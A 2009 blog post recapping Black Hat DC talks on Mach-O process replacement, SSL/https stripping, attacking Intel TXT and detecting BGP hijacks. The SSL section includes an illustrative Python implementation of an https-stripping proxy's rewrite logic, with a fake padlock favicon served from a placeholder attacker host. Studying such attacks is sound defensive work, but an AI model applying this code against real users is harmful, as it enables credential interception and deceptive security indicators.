Sunday, February 22, 2009

Some Brief BH DC Afterthoughts

Though it's almost too late for this, I thought I would write briefly on BH DC. I had a blast while I was there and there were some very interesting talks. In case you are interested in the content of these talks, slides, papers, demos and videos are being uploaded to this site:

https://www.blackhat.com/html/bh-dc-09/bh-dc-09-archives.html

The talks I liked the most were:


Let Your Mach-O Fly by Vincenzo Iozzo


This talk describes how to replace a running process in memory with another by unmapping the current process, replacing the header and enveloping the old process with the new process. It was really cool to see the demos, but if you watch the video (if it is uploaded), you will see he has trouble with the Safari example. I didn't have time to confirm my suspicions, but I thought this was because he didn't supply the entire path to the desired executable. I went up to him after the talk to ask about this, but things were so rushed at the end that I didn't get a chance. I emailed him and he replied: ``I found the problem, I forgot to patch a known bug before my talk,'' so he seems to have found the problem. The code for this one is available online.

New Techniques for Defeating SSL/TLS by Moxie Marlinspike

I wasn't completely sure at first that this was going to be an interesting talk, but it turned out very nice. The title is misleading in that it wasn't really about SSL in general but about https specifically. He has a tool that can MITM connections by rewriting the https references in a page to http, so the browser never makes the secure request at all. While that on its own is not as interesting, the more interesting part comes into play with the creation and usage of fake certificates to make things "secure". It was also funny how he used the favicon feature to give a positive indicator by switching it with a padlock. I'm not sure how effective it would be against items like Yahoo!'s sign in seal (among others), but there are other interesting possibilities. The code for his presentation is also available online. (updated link)
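To make the stripping step concrete, here is an added Python model of what such a proxy does to the pages it forwards. It is an illustration written for this post, not code from the talk or from the tool itself: it shows only the HTML rewrite (https links and form actions downgraded to http, the favicon swapped for a padlock) and the bookkeeping the proxy needs so it can fetch a downgraded URL over real https from the origin. The padlock image URL and the bank page are made up.

```python
import re

# Any https URL inside the page: link targets, form actions, script sources.
HTTPS_URL_RE = re.compile(r'https://[^\s"\'<>]+', re.IGNORECASE)
# <link ...> tags, so the favicon can be swapped for a padlock image.
LINK_TAG_RE = re.compile(r'<link\b[^>]*>', re.IGNORECASE)
HREF_RE = re.compile(r'href=(["\'])([^"\']*)\1', re.IGNORECASE)
ICON_REL_RE = re.compile(r'rel=["\']?[^"\'>]*icon', re.IGNORECASE)


class HttpsStripper:
    """Rewrites pages so the victim only ever talks plain http to the proxy,
    and remembers which URLs were downgraded so the proxy can fetch them
    over real https from the origin."""

    def __init__(self, lock_icon_url):
        # Assumed attacker-hosted padlock image (hypothetical URL).
        self.lock_icon_url = lock_icon_url
        # host/path of every URL we downgraded, without the scheme.
        self.stripped = set()

    def strip_html(self, html):
        def downgrade(match):
            rest = match.group(0)[len("https://"):]
            self.stripped.add(rest)
            return "http://" + rest

        html = HTTPS_URL_RE.sub(downgrade, html)
        return LINK_TAG_RE.sub(self._swap_favicon, html)

    def _swap_favicon(self, match):
        tag = match.group(0)
        if ICON_REL_RE.search(tag) is None:
            return tag  # not a favicon link, leave it alone
        return HREF_RE.sub(
            lambda m: "href=" + m.group(1) + self.lock_icon_url + m.group(1), tag)

    def upstream_url(self, victim_url):
        """URL the proxy should fetch from the real server for a request the
        victim made over http: https if we downgraded that URL earlier."""
        if not victim_url.lower().startswith("http://"):
            return victim_url
        rest = victim_url[len("http://"):]
        return "https://" + rest if rest in self.stripped else victim_url


# Constructed sample page, not a real site.
SAMPLE_PAGE = (
    '<html><head>'
    '<link rel="shortcut icon" href="https://bank.example/favicon.ico">'
    '</head><body>'
    '<a href="https://bank.example/login">Sign in</a>'
    '<form action="https://bank.example/auth" method="post"></form>'
    '</body></html>'
)


def demo():
    """Strip the sample page and return the stripper (with its bookkeeping) and the result."""
    stripper = HttpsStripper("http://attacker.invalid/lock.ico")
    return stripper, stripper.strip_html(SAMPLE_PAGE)


if __name__ == "__main__":
    s, page = demo()
    print(page)
    print(sorted(s.stripped))
    print(s.upstream_url("http://bank.example/login"))
```

Because the browser never issues an https request, it never sees a certificate and never has a warning to show; that is why the fake padlock favicon matters as the only "secure" indicator the user gets. The proxy keeps the real TLS connection to the origin for each URL it downgraded, which is what the `stripped` set is for.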


Attacking Intel(R) Trusted Execution Technology by Joanna Rutkowska and Rafal Wojtczuk


This was an awesome talk. It was a pleasure to see this team of famous researchers talk about the internals of TXT and how they could exploit it. The video for this one is up, and it would definitely be worthwhile to watch it. Joanna has also posted the paper and slides here:
http://theinvisiblethings.blogspot.com/2009/02/attacking-intel-txt-paper-and-slides.html

Defending Against BGP Man-In-the-Middle Attacks by Earl Zmijewski

This was another awesome talk! I didn't know the fine details about routers before the talk, but the MITM attack is quite simple. It was also very interesting to see how they came to a solution for detecting these attacks, and that after they had refined their detection algorithm they only found three instances of the attack "in the wild", all of which could be explained. Another must read/watch I think, and Earl is entertaining :-)
